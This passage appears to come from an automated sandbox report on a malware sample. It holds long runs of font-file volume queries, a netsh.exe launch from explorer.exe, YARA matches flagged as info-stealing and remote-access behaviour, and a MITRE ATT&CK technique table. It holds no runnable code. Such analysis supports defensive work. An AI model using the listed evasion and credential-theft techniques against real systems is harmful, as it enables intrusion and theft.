          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\triage_dropped_file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

          Stealing of Sensitive Information

Source: Yara match | File source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (the number before a technique is the signature-count badge shown in the report)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Shared Modules | Path Interception | 612 Process Injection | 1 Masquerading | OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 612 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 112 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 4 Obfuscated Files or Information | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 13 Software Packing | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
